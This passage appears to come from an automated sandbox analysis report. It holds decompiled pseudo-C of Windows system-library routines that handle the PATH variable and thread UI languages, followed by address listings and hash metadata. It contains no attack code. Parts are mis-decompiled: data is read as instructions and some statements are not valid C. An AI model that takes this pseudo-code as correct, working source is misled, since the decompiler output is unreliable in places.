                                                      														__eax = E011A39F2(__ecx);
                                                      														__edi = __eax;
                                                      													}
                                                      													goto L28;
                                                      												case 8:
                                                      													__eax = 0;
                                                      													 *(__edi - 2) = __ax;
                                                      													 *0x1206e58 & 0x0000ffff = E0115F3E0(__edi,  *0x1206e5c,  *0x1206e58 & 0x0000ffff);
                                                      													 *(__esi + 0x38) = __edi;
                                                      													__eax =  *0x1206e58 & 0x0000ffff;
                                                      													__eax = ( *0x1206e58 & 0x0000ffff) >> 1;
                                                      													__edi = __edi + __eax * 2;
                                                      													__edi = __edi + 2;
                                                      													L28:
                                                      													_t294 = _v16;
                                                      													_t310 = _v32;
                                                      													L29:
                                                      													_t285 = _t285 + 4;
                                                      													__eflags = _t285;
                                                      													_v56 = _t285;
                                                      													goto L30;
                                                      											}
                                                      										}
                                                      									}
                                                      									goto L108;
                                                      									L30:
                                                      									_t294 = _t294 + 1;
                                                      									_v16 = _t294;
                                                      									__eflags = _t294 - _v48;
                                                      								} while (_t294 < _v48);
                                                      								goto L31;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					while(1) {
                                                      						L1:
                                                      						_t244 =  *(_v60 + _t321 * 4);
                                                      						if(_t244 > 8) {
                                                      							break;
                                                      						}
                                                      						switch( *((intOrPtr*)(_t244 * 4 +  &M01142935))) {
                                                      							case 0:
                                                      								__ax =  *0x1208488;
                                                      								__eflags = __ax;
                                                      								if(__ax != 0) {
                                                      									__eax = __ax & 0x0000ffff;
                                                      									__ebx = __ebx + 2;
                                                      									__eflags = __ebx;
                                                      									goto L53;
                                                      								}
                                                      								goto L14;
                                                      							case 1:
                                                      								L44:
                                                      								_t310 =  &_v64;
                                                      								_v80 = E01142E3E(0,  &_v64);
                                                      								_t281 = _t281 + _v64 + 2;
                                                      								goto L13;
                                                      							case 2:
                                                      								__eax =  *0x1208480 & 0x0000ffff;
                                                      								__ebx = __ebx + __eax;
                                                      								__eflags = __dl;
                                                      								if(__dl != 0) {
                                                      									__eax = 0x1208480;
                                                      									goto L80;
                                                      								}
                                                      								goto L14;
                                                      							case 3:
                                                      								__eax = E0112EEF0(0x12079a0);
                                                      								__eax =  &_v44;
                                                      								_push(__eax);
                                                      								_push(0);
                                                      								_push(0);
                                                      								_push(4);
                                                      								_push(L"PATH");
                                                      								_push(0);
                                                      								L57();
                                                      								__esi = __eax;
                                                      								_v68 = __esi;
                                                      								__eflags = __esi - 0xc0000023;
                                                      								if(__esi != 0xc0000023) {
                                                      									L10:
                                                      									__eax = E0112EB70(__ecx, 0x12079a0);
                                                      									__eflags = __esi - 0xc0000100;
                                                      									if(__esi == 0xc0000100) {
                                                      										_v44 = _v44 & 0x00000000;
                                                      										__eax = 0;
                                                      										_v68 = 0;
                                                      										goto L13;
                                                      									} else {
                                                      										__eflags = __esi;
                                                      										if(__esi < 0) {
                                                      											L32:
                                                      											_t218 = _v72;
                                                      											__eflags = _t218;
                                                      											if(_t218 != 0) {
                                                      												L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                      											}
                                                      											_t219 = _v52;
                                                      											__eflags = _t219;
                                                      											if(_t219 != 0) {
                                                      												__eflags = _t329;
                                                      												if(_t329 < 0) {
                                                      													L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
                                                      													_t219 = 0;
                                                      												}
                                                      											}
                                                      											goto L36;
                                                      										} else {
                                                      											__eax = _v44;
                                                      											__ebx = __ebx + __eax * 2;
                                                      											__ebx = __ebx + 2;
                                                      											__eflags = __ebx;
                                                      											L13:
                                                      											_t290 = _v36;
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eax = _v44;
                                                      									__ecx =  *0x1207b9c; // 0x0
                                                      									_v44 + _v44 =  *[fs:0x30];
                                                      									__ecx = __ecx + 0x180000;
                                                      									__eax = L01134620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                      									_v72 = __eax;
                                                      									__eflags = __eax;
                                                      									if(__eax == 0) {
                                                      										__eax = E0112EB70(__ecx, 0x12079a0);
                                                      										__eax = _v52;
                                                      										L36:
                                                      										_pop(_t322);
                                                      										_pop(_t330);
                                                      										__eflags = _v8 ^ _t336;
                                                      										_pop(_t282);
                                                      										return E0115B640(_t219, _t282, _v8 ^ _t336, _t310, _t322, _t330);
                                                      									} else {
                                                      										__ecx =  &_v44;
                                                      										_push(__ecx);
                                                      										_push(_v44);
                                                      										_push(__eax);
                                                      										_push(4);
                                                      										_push(L"PATH");
                                                      										_push(0);
                                                      										L57();
                                                      										__esi = __eax;
                                                      										_v68 = __eax;
                                                      										goto L10;
                                                      									}
                                                      								}
                                                      								goto L108;
                                                      							case 4:
                                                      								__ebx = __ebx + 4;
                                                      								goto L14;
                                                      							case 5:
                                                      								_t277 = _v56;
                                                      								if(_v56 != 0) {
                                                      									_t310 =  &_v36;
                                                      									_t279 = E01142E3E(_t277,  &_v36);
                                                      									_t290 = _v36;
                                                      									_v76 = _t279;
                                                      								}
                                                      								if(_t290 == 0) {
                                                      									goto L44;
                                                      								} else {
                                                      									_t281 = _t281 + 2 + _t290;
                                                      								}
                                                      								goto L14;
                                                      							case 6:
                                                      								__eax =  *0x1205764 & 0x0000ffff;
                                                      								goto L53;
                                                      							case 7:
                                                      								__eax =  *0x1208478 & 0x0000ffff;
                                                      								__ebx = __ebx + __eax;
                                                      								__eflags = _a8;
                                                      								if(_a8 != 0) {
                                                      									__ebx = __ebx + 0x16;
                                                      									__ebx = __ebx + __eax;
                                                      								}
                                                      								__eflags = __dl;
                                                      								if(__dl != 0) {
                                                      									__eax = 0x1208478;
                                                      									L80:
                                                      									_v32 = __eax;
                                                      								}
                                                      								goto L14;
                                                      							case 8:
                                                      								__eax =  *0x1206e58 & 0x0000ffff;
                                                      								__eax = ( *0x1206e58 & 0x0000ffff) + 2;
                                                      								L53:
                                                      								__ebx = __ebx + __eax;
                                                      								L14:
                                                      								_t321 = _t321 + 1;
                                                      								if(_t321 >= _v48) {
                                                      									goto L16;
                                                      								} else {
                                                      									_t310 = _v37;
                                                      									goto L1;
                                                      								}
                                                      								goto L108;
                                                      						}
                                                      					}
                                                      					L56:
                                                      					_t295 = 0x25;
                                                      					asm("int 0x29");
                                                      					asm("out 0x28, al");
                                                      					asm("adc al, 0x1");
                                                      					asm("o16 sub [ecx+eax], dl");
                                                      					asm("loopne 0x29");
                                                      					asm("adc al, 0x1");
                                                      					asm("adc al, 0x1");
                                                      					_t331 = _t328 + 1;
                                                      					 *((intOrPtr*)(_t295 + _t244)) =  *((intOrPtr*)(_t295 + _t244)) - _t310;
                                                      					_pop(_t286);
                                                      					asm("sbb [ecx], al");
                                                      					_t246 = _t340;
                                                      					_t342 = _t244 + 0x1f011426;
                                                      					 *((intOrPtr*)(_t295 + _t246)) =  *((intOrPtr*)(_t295 + _t246)) - _t310;
                                                      					_t247 = _t246 ^ 0x0201185b;
                                                      					 *((intOrPtr*)(_t295 + _t247)) =  *((intOrPtr*)(_t295 + _t247)) - _t310;
                                                      					 *_t247 =  *_t247 - 0x14;
                                                      					asm("daa");
                                                      					asm("adc al, 0x1");
                                                      					_push(ds);
                                                      					 *((intOrPtr*)(_t295 + _t247)) =  *((intOrPtr*)(_t295 + _t247)) - _t310;
                                                      					_t333 = _t328 + 1 + _t331 - 1;
                                                      					 *((intOrPtr*)(_t295 + _t247)) =  *((intOrPtr*)(_t295 + _t247)) - _t310;
                                                      					asm("daa");
                                                      					asm("adc al, 0x1");
                                                      					asm("fcomp dword [ebx+0x18]");
                                                      					 *((intOrPtr*)(_t247 +  &_a1546912016)) =  *((intOrPtr*)(_t247 +  &_a1546912016)) + _t328 + 1 + _t331 - 1;
                                                      					asm("sbb [ecx], al");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					_push(0x20);
                                                      					_push(0x11eff00);
                                                      					E0116D08C(_t286, _t323, _t333);
                                                      					_v44 =  *[fs:0x18];
                                                      					_t324 = 0;
                                                      					 *_a24 = 0;
                                                      					_t287 = _a12;
                                                      					__eflags = _t287;
                                                      					if(_t287 == 0) {
                                                      						_t250 = 0xc0000100;
                                                      					} else {
                                                      						_v8 = 0;
                                                      						_t334 = 0xc0000100;
                                                      						_v52 = 0xc0000100;
                                                      						_t252 = 4;
                                                      						while(1) {
                                                      							_v40 = _t252;
                                                      							__eflags = _t252;
                                                      							if(_t252 == 0) {
                                                      								break;
                                                      							}
                                                      							_t300 = _t252 * 0xc;
                                                      							_v48 = _t300;
                                                      							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0x10f1664));
                                                      							if(__eflags <= 0) {
                                                      								if(__eflags == 0) {
                                                      									_t267 = E0115E5C0(_a8,  *((intOrPtr*)(_t300 + 0x10f1668)), _t287);
                                                      									_t342 = _t342 + 0xc;
                                                      									__eflags = _t267;
                                                      									if(__eflags == 0) {
                                                      										_t334 = E011951BE(_t287,  *((intOrPtr*)(_v48 + 0x10f166c)), _a16, _t324, _t334, __eflags, _a20, _a24);
                                                      										_v52 = _t334;
                                                      										break;
                                                      									} else {
                                                      										_t252 = _v40;
                                                      										goto L62;
                                                      									}
                                                      									goto L70;
                                                      								} else {
                                                      									L62:
                                                      									_t252 = _t252 - 1;
                                                      									continue;
                                                      								}
                                                      							}
                                                      							break;
                                                      						}
                                                      						_v32 = _t334;
                                                      						__eflags = _t334;
                                                      						if(_t334 < 0) {
                                                      							__eflags = _t334 - 0xc0000100;
                                                      							if(_t334 == 0xc0000100) {
                                                      								_t296 = _a4;
                                                      								__eflags = _t296;
                                                      								if(_t296 != 0) {
                                                      									_v36 = _t296;
                                                      									__eflags =  *_t296 - _t324;
                                                      									if( *_t296 == _t324) {
                                                      										_t334 = 0xc0000100;
                                                      										goto L76;
                                                      									} else {
                                                      										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                                                      										_t254 =  *((intOrPtr*)(_t312 + 0x10));
                                                      										__eflags =  *((intOrPtr*)(_t254 + 0x48)) - _t296;
                                                      										if( *((intOrPtr*)(_t254 + 0x48)) == _t296) {
                                                      											__eflags =  *(_t312 + 0x1c);
                                                      											if( *(_t312 + 0x1c) == 0) {
                                                      												L106:
                                                      												_t334 = E01142AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
                                                      												_v32 = _t334;
                                                      												__eflags = _t334 - 0xc0000100;
                                                      												if(_t334 != 0xc0000100) {
                                                      													goto L69;
                                                      												} else {
                                                      													_t324 = 1;
                                                      													_t296 = _v36;
                                                      													goto L75;
                                                      												}
                                                      											} else {
                                                      												_t257 = E01126600( *(_t312 + 0x1c));
                                                      												__eflags = _t257;
                                                      												if(_t257 != 0) {
                                                      													goto L106;
                                                      												} else {
                                                      													_t296 = _a4;
                                                      													goto L75;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											L75:
                                                      											_t334 = E01142C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
                                                      											L76:
                                                      											_v32 = _t334;
                                                      											goto L69;
                                                      										}
                                                      									}
                                                      									goto L108;
                                                      								} else {
                                                      									E0112EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      									_v8 = 1;
                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                      									_t334 = _a24;
                                                      									_t264 = E01142AE4( &_v36, _a8, _t287, _a16, _a20, _t334);
                                                      									_v32 = _t264;
                                                      									__eflags = _t264 - 0xc0000100;
                                                      									if(_t264 == 0xc0000100) {
                                                      										_v32 = E01142C50(_v36, _a8, _t287, _a16, _a20, _t334, 1);
                                                      									}
                                                      									_v8 = _t324;
                                                      									E01142ACB();
                                                      								}
                                                      							}
                                                      						}
                                                      						L69:
                                                      						_v8 = 0xfffffffe;
                                                      						_t250 = _t334;
                                                      					}
                                                      					L70:
                                                      					return E0116D0D1(_t250);
                                                      				}
                                                      				L108:
                                                      			}
                                                      0x011429e3
                                                      0x011429e3
                                                      0x00000000
                                                      0x011429e3
                                                      0x011429dd
                                                      0x00000000
                                                      0x011429db
                                                      0x011429e6
                                                      0x011429e9
                                                      0x011429eb
                                                      0x011429ed
                                                      0x011429f3
                                                      0x011429f5
                                                      0x011429f8
                                                      0x011429fa
                                                      0x01142a97
                                                      0x01142a9a
                                                      0x01142a9d
                                                      0x01142add
                                                      0x00000000
                                                      0x01142a9f
                                                      0x01142aa2
                                                      0x01142aa5
                                                      0x01142aa8
                                                      0x01142aab
                                                      0x01185cab
                                                      0x01185caf
                                                      0x01185cc5
                                                      0x01185cda
                                                      0x01185cdc
                                                      0x01185cdf
                                                      0x01185ce5
                                                      0x00000000
                                                      0x01185ceb
                                                      0x01185ced
                                                      0x01185cee
                                                      0x00000000
                                                      0x01185cee
                                                      0x01185cb1
                                                      0x01185cb4
                                                      0x01185cb9
                                                      0x01185cbb
                                                      0x00000000
                                                      0x01185cbd
                                                      0x01185cbd
                                                      0x00000000
                                                      0x01185cbd
                                                      0x01185cbb
                                                      0x01142ab1
                                                      0x01142ab1
                                                      0x01142ac4
                                                      0x01142ac6
                                                      0x01142ac6
                                                      0x00000000
                                                      0x01142ac6
                                                      0x01142aab
                                                      0x00000000
                                                      0x01142a00
                                                      0x01142a09
                                                      0x01142a0e
                                                      0x01142a21
                                                      0x01142a24
                                                      0x01142a35
                                                      0x01142a3a
                                                      0x01142a3d
                                                      0x01142a42
                                                      0x01142a59
                                                      0x01142a59
                                                      0x01142a5c
                                                      0x01142a5f
                                                      0x01142a5f
                                                      0x011429fa
                                                      0x011429f3
                                                      0x01142a64
                                                      0x01142a64
                                                      0x01142a6b
                                                      0x01142a6b
                                                      0x01142a6d
                                                      0x01142a72
                                                      0x01142a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: 30d4151814a853986ae48069f107b04be08e4b6da5576a5f21ae33915b38e732
                                                      • Instruction ID: 9f1b3329d39d3414da17fd9699e81f50f5b4f35d77c7c1dd2c2ca2136922dd00
                                                      • Opcode Fuzzy Hash: 30d4151814a853986ae48069f107b04be08e4b6da5576a5f21ae33915b38e732
                                                      • Instruction Fuzzy Hash: CBC1B275E00619DFDB2DDF99E880BAEBBB1FF58B44F054029F901AB250D734A981CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E0114FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                      				char _v5;
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				char _v16;
                                                      				char _v17;
                                                      				char _v20;
                                                      				signed int _v24;
                                                      				char _v28;
                                                      				char _v32;
                                                      				signed int _v40;
                                                      				void* __ecx;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				signed int _t73;
                                                      				intOrPtr* _t75;
                                                      				signed int _t77;
                                                      				signed int _t79;
                                                      				signed int _t81;
                                                      				intOrPtr _t83;
                                                      				intOrPtr _t85;
                                                      				intOrPtr _t86;
                                                      				signed int _t91;
                                                      				signed int _t94;
                                                      				signed int _t95;
                                                      				signed int _t96;
                                                      				signed int _t106;
                                                      				signed int _t108;
                                                      				signed int _t114;
                                                      				signed int _t116;
                                                      				signed int _t118;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				void* _t129;
                                                      				signed int _t130;
                                                      				void* _t132;
                                                      				intOrPtr* _t134;
                                                      				signed int _t138;
                                                      				signed int _t141;
                                                      				signed int _t147;
                                                      				intOrPtr _t153;
                                                      				signed int _t154;
                                                      				signed int _t155;
                                                      				signed int _t170;
                                                      				void* _t174;
                                                      				signed int _t176;
                                                      				signed int _t177;
                                                      
                                                      				_t129 = __ebx;
                                                      				_push(_t132);
                                                      				_push(__esi);
                                                      				_t174 = _t132;
                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                      				if(_t73 >= 0) {
                                                      					L5:
                                                      					return _t73;
                                                      				} else {
                                                      					E0112EEF0(0x1207b60);
                                                      					_t134 =  *0x1207b84; // 0x77ad7b80
                                                      					_t2 = _t174 + 0x24; // 0x24
                                                      					_t75 = _t2;
                                                      					if( *_t134 != 0x1207b80) {
                                                      						_push(3);
                                                      						asm("int 0x29");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						asm("int3");
                                                      						_push(0x1207b60);
                                                      						_t170 = _v8;
                                                      						_v28 = 0;
                                                      						_v40 = 0;
                                                      						_v24 = 0;
                                                      						_v17 = 0;
                                                      						_v32 = 0;
                                                      						__eflags = _t170 & 0xffff7cf2;
                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                      							L43:
                                                      							_t77 = 0xc000000d;
                                                      						} else {
                                                      							_t79 = _t170 & 0x0000000c;
                                                      							__eflags = _t79;
                                                      							if(_t79 != 0) {
                                                      								__eflags = _t79 - 0xc;
                                                      								if(_t79 == 0xc) {
                                                      									goto L43;
                                                      								} else {
                                                      									goto L9;
                                                      								}
                                                      							} else {
                                                      								_t170 = _t170 | 0x00000008;
                                                      								__eflags = _t170;
                                                      								L9:
                                                      								_t81 = _t170 & 0x00000300;
                                                      								__eflags = _t81 - 0x300;
                                                      								if(_t81 == 0x300) {
                                                      									goto L43;
                                                      								} else {
                                                      									_t138 = _t170 & 0x00000001;
                                                      									__eflags = _t138;
                                                      									_v24 = _t138;
                                                      									if(_t138 != 0) {
                                                      										__eflags = _t81;
                                                      										if(_t81 != 0) {
                                                      											goto L43;
                                                      										} else {
                                                      											goto L11;
                                                      										}
                                                      									} else {
                                                      										L11:
                                                      										_push(_t129);
                                                      										_t77 = E01126D90( &_v20);
                                                      										_t130 = _t77;
                                                      										__eflags = _t130;
                                                      										if(_t130 >= 0) {
                                                      											_push(_t174);
                                                      											__eflags = _t170 & 0x00000301;
                                                      											if((_t170 & 0x00000301) == 0) {
                                                      												_t176 = _a8;
                                                      												__eflags = _t176;
                                                      												if(__eflags == 0) {
                                                      													L64:
                                                      													_t83 =  *[fs:0x18];
                                                      													_t177 = 0;
                                                      													__eflags =  *(_t83 + 0xfb8);
                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                      														E011276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                      													}
                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                      													goto L15;
                                                      												} else {
                                                      													asm("sbb edx, edx");
                                                      													_t114 = E011B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                      													__eflags = _t114;
                                                      													if(_t114 < 0) {
                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                      														E0111B150();
                                                      													}
                                                      													_t116 = E011B6D81(_t176,  &_v16);
                                                      													__eflags = _t116;
                                                      													if(_t116 >= 0) {
                                                      														__eflags = _v16 - 2;
                                                      														if(_v16 < 2) {
                                                      															L56:
                                                      															_t118 = E011275CE(_v20, 5, 0);
                                                      															__eflags = _t118;
                                                      															if(_t118 < 0) {
                                                      																L67:
                                                      																_t130 = 0xc0000017;
                                                      																goto L32;
                                                      															} else {
                                                      																__eflags = _v12;
                                                      																if(_v12 == 0) {
                                                      																	goto L67;
                                                      																} else {
                                                      																	_t153 =  *0x1208638; // 0x0
                                                      																	_t122 = L011238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                      																	_t154 = _v12;
                                                      																	_t130 = _t122;
                                                      																	__eflags = _t130;
                                                      																	if(_t130 >= 0) {
                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                      																		__eflags = _t123;
                                                      																		if(_t123 != 0) {
                                                      																			_t155 = _a12;
                                                      																			__eflags = _t155;
                                                      																			if(_t155 != 0) {
                                                      																				 *_t155 = _t123;
                                                      																			}
                                                      																			goto L64;
                                                      																		} else {
                                                      																			E011276E2(_t154);
                                                      																			goto L41;
                                                      																		}
                                                      																	} else {
                                                      																		E011276E2(_t154);
                                                      																		_t177 = 0;
                                                      																		goto L18;
                                                      																	}
                                                      																}
                                                      															}
                                                      														} else {
                                                      															__eflags =  *_t176;
                                                      															if( *_t176 != 0) {
                                                      																goto L56;
                                                      															} else {
                                                      																__eflags =  *(_t176 + 2);
                                                      																if( *(_t176 + 2) == 0) {
                                                      																	goto L64;
                                                      																} else {
                                                      																	goto L56;
                                                      																}
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_t130 = 0xc000000d;
                                                      														goto L32;
                                                      													}
                                                      												}
                                                      												goto L35;
                                                      											} else {
                                                      												__eflags = _a8;
                                                      												if(_a8 != 0) {
                                                      													_t77 = 0xc000000d;
                                                      												} else {
                                                      													_v5 = 1;
                                                      													L0114FCE3(_v20, _t170);
                                                      													_t177 = 0;
                                                      													__eflags = 0;
                                                      													L15:
                                                      													_t85 =  *[fs:0x18];
                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                      														L18:
                                                      														__eflags = _t130;
                                                      														if(_t130 != 0) {
                                                      															goto L32;
                                                      														} else {
                                                      															__eflags = _v5 - _t130;
                                                      															if(_v5 == _t130) {
                                                      																goto L32;
                                                      															} else {
                                                      																_t86 =  *[fs:0x18];
                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                      																}
                                                      																__eflags = _t177;
                                                      																if(_t177 == 0) {
                                                      																	L31:
                                                      																	__eflags = 0;
                                                      																	L011270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                      																	goto L32;
                                                      																} else {
                                                      																	__eflags = _v24;
                                                      																	_t91 =  *(_t177 + 0x20);
                                                      																	if(_v24 != 0) {
                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                      																		goto L31;
                                                      																	} else {
                                                      																		_t141 = _t91 & 0x00000040;
                                                      																		__eflags = _t170 & 0x00000100;
                                                      																		if((_t170 & 0x00000100) == 0) {
                                                      																			__eflags = _t141;
                                                      																			if(_t141 == 0) {
                                                      																				L74:
                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                      																				goto L27;
                                                      																			} else {
                                                      																				_t177 = E0114FD22(_t177);
                                                      																				__eflags = _t177;
                                                      																				if(_t177 == 0) {
                                                      																					goto L42;
                                                      																				} else {
                                                      																					_t130 = E0114FD9B(_t177, 0, 4);
                                                      																					__eflags = _t130;
                                                      																					if(_t130 != 0) {
                                                      																						goto L42;
                                                      																					} else {
                                                      																						_t68 = _t177 + 0x20;
                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                      																						__eflags =  *_t68;
                                                      																						_t91 =  *(_t177 + 0x20);
                                                      																						goto L74;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																			goto L35;
                                                      																		} else {
                                                      																			__eflags = _t141;
                                                      																			if(_t141 != 0) {
                                                      																				_t177 = E0114FD22(_t177);
                                                      																				__eflags = _t177;
                                                      																				if(_t177 == 0) {
                                                      																					L42:
                                                      																					_t77 = 0xc0000001;
                                                      																					goto L33;
                                                      																				} else {
                                                      																					_t130 = E0114FD9B(_t177, 0, 4);
                                                      																					__eflags = _t130;
                                                      																					if(_t130 != 0) {
                                                      																						goto L42;
                                                      																					} else {
                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                      																						_t91 =  *(_t177 + 0x20);
                                                      																						goto L26;
                                                      																					}
                                                      																				}
                                                      																				goto L35;
                                                      																			} else {
                                                      																				L26:
                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                      																				__eflags = _t94;
                                                      																				L27:
                                                      																				 *(_t177 + 0x20) = _t94;
                                                      																				__eflags = _t170 & 0x00008000;
                                                      																				if((_t170 & 0x00008000) != 0) {
                                                      																					_t95 = _a12;
                                                      																					__eflags = _t95;
                                                      																					if(_t95 != 0) {
                                                      																						_t96 =  *_t95;
                                                      																						__eflags = _t96;
                                                      																						if(_t96 != 0) {
                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                      																							_t40 = _t177 + 0x20;
                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                      																							__eflags =  *_t40;
                                                      																						}
                                                      																					}
                                                      																				}
                                                      																				goto L31;
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                      														_t106 =  *(_t147 + 0x20);
                                                      														__eflags = _t106 & 0x00000040;
                                                      														if((_t106 & 0x00000040) != 0) {
                                                      															_t147 = E0114FD22(_t147);
                                                      															__eflags = _t147;
                                                      															if(_t147 == 0) {
                                                      																L41:
                                                      																_t130 = 0xc0000001;
                                                      																L32:
                                                      																_t77 = _t130;
                                                      																goto L33;
                                                      															} else {
                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                      																_t106 =  *(_t147 + 0x20);
                                                      																goto L17;
                                                      															}
                                                      															goto L35;
                                                      														} else {
                                                      															L17:
                                                      															_t108 = _t106 | 0x00000080;
                                                      															__eflags = _t108;
                                                      															 *(_t147 + 0x20) = _t108;
                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                      															goto L18;
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											L33:
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L35:
                                                      						return _t77;
                                                      					} else {
                                                      						 *_t75 = 0x1207b80;
                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                      						 *_t134 = _t75;
                                                      						 *0x1207b84 = _t75;
                                                      						_t73 = E0112EB70(_t134, 0x1207b60);
                                                      						if( *0x1207b20 != 0) {
                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                      								_t73 = E0112FF60( *0x1207b20);
                                                      							}
                                                      						}
                                                      						goto L5;
                                                      					}
                                                      				}
                                                      			}
                                                      0x0114fab0
                                                      0x0114fab2
                                                      0x0114fab3
                                                      0x0114fab4
                                                      0x0114fabc
                                                      0x0114fac0
                                                      0x0114fb14
                                                      0x0114fb17
                                                      0x0114fac2
                                                      0x0114fac8
                                                      0x0114facd
                                                      0x0114fad3
                                                      0x0114fad3
                                                      0x0114fadd
                                                      0x0114fb18
                                                      0x0114fb1b
                                                      0x0114fb1d
                                                      0x0114fb1e
                                                      0x0114fb1f
                                                      0x0114fb20
                                                      0x0114fb21
                                                      0x0114fb22
                                                      0x0114fb23
                                                      0x0114fb24
                                                      0x0114fb25
                                                      0x0114fb26
                                                      0x0114fb27
                                                      0x0114fb28
                                                      0x0114fb29
                                                      0x0114fb2a
                                                      0x0114fb2b
                                                      0x0114fb2c
                                                      0x0114fb2d
                                                      0x0114fb2e
                                                      0x0114fb2f
                                                      0x0114fb3a
                                                      0x0114fb3b
                                                      0x0114fb3e
                                                      0x0114fb41
                                                      0x0114fb44
                                                      0x0114fb47
                                                      0x0114fb4a
                                                      0x0114fb4d
                                                      0x0114fb53
                                                      0x0118bdcb
                                                      0x0118bdcb
                                                      0x0114fb59
                                                      0x0114fb5b
                                                      0x0114fb5b
                                                      0x0114fb5e
                                                      0x0118bdd5
                                                      0x0118bdd8
                                                      0x00000000
                                                      0x0118bdda
                                                      0x00000000
                                                      0x0118bdda
                                                      0x0114fb64
                                                      0x0114fb64
                                                      0x0114fb64
                                                      0x0114fb67
                                                      0x0114fb6e
                                                      0x0114fb70
                                                      0x0114fb72
                                                      0x00000000
                                                      0x0114fb78
                                                      0x0114fb7a
                                                      0x0114fb7a
                                                      0x0114fb7d
                                                      0x0114fb80
                                                      0x0118bddf
                                                      0x0118bde1
                                                      0x00000000
                                                      0x0118bde3
                                                      0x00000000
                                                      0x0118bde3
                                                      0x0114fb86
                                                      0x0114fb86
                                                      0x0114fb86
                                                      0x0114fb8b
                                                      0x0114fb90
                                                      0x0114fb92
                                                      0x0114fb94
                                                      0x0114fb9a
                                                      0x0114fb9b
                                                      0x0114fba1
                                                      0x0118bde8
                                                      0x0118bdeb
                                                      0x0118bded
                                                      0x0118beb5
                                                      0x0118beb5
                                                      0x0118bebb
                                                      0x0118bebd
                                                      0x0118bec3
                                                      0x0118bed2
                                                      0x0118bedd
                                                      0x0118bedd
                                                      0x0118beed
                                                      0x00000000
                                                      0x0118bdf3
                                                      0x0118bdfe
                                                      0x0118be06
                                                      0x0118be0b
                                                      0x0118be0d
